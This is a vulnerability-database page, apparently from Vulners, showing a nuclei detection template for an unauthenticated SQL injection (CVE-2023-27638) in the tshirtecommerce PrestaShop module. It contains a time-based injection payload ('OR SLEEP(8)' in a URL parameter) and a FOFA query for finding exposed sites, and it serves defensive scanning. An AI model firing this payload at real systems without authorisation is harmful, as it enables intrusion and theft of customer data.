Lucene search
K

tshirtecommerce PrestaShop Module - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

tshirteecommerce PrestaShop module vulnerable to SQL injection, allowing unauthorized database access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-27638
22 Mar 202315:35
circl
CNNVD
PrestaShop SQL注入漏洞
22 Mar 202300:00
cnnvd
CVE
CVE-2023-27638
22 Mar 202300:00
cve
Cvelist
CVE-2023-27638
22 Mar 202300:00
cvelist
NVD
CVE-2023-27638
22 Mar 202313:15
nvd
Prion
Sql injection
22 Mar 202313:15
prion
Positive Technologies
PT-2023-21273 · Prestashop · Tshirtecommerce
22 Mar 202300:00
ptsecurity
RedhatCVE
CVE-2023-27638
23 May 202503:33
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2023-27638
21 Mar 202300:00
vulncheck_kev
Vulnrichment
CVE-2023-27638
22 Mar 202300:00
vulnrichment
Rows per page
id: CVE-2023-27638

info:
  name: tshirtecommerce PrestaShop Module - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the tshirtecommerce_design_cart_id parameter, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database. This is due to lack of input sanitization, as shown in the patch where pSQL() is now used.
  impact: |
    Unauthenticated attackers can execute SQL injection through the tshirtecommerce_design_cart_id parameter to extract the complete PrestaShop database including customer data and payment information.
  remediation: |
    Update the tshirtecommerce module to the latest version and apply all security patches.
  reference:
    - https://security.friendsofpresta.org/module/2023/03/21/tshirtecommerce_cwe-89.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27638
  classification:
    cve-id: CVE-2023-27638
    cwe-id: CWE-89
    epss-score: 0.03299
    epss-percentile: 0.87024
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: tshirtecommerce
    product: prestashop
    fofa-query: body="Prestashop" && body="tshirtecommerce"
  tags: cve,cve2023,prestashop,tshirtecommerce,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - "contains_all(tolower(body), 'prestashop', 'tshirtecommerce')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /module/tshirtecommerce/designer?tshirtecommerce_design_cart_id=1%20OR%20SLEEP(8) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=8"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100ebb83aea785b29ae99be38cbf32f92e6c1addb9e5a93300b810fe7da6b6885c10220148ac275cfd7334c30f5e3602f387a8f4a466d73846749b0ceb6244bd5378a91:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.03299
SSVC
17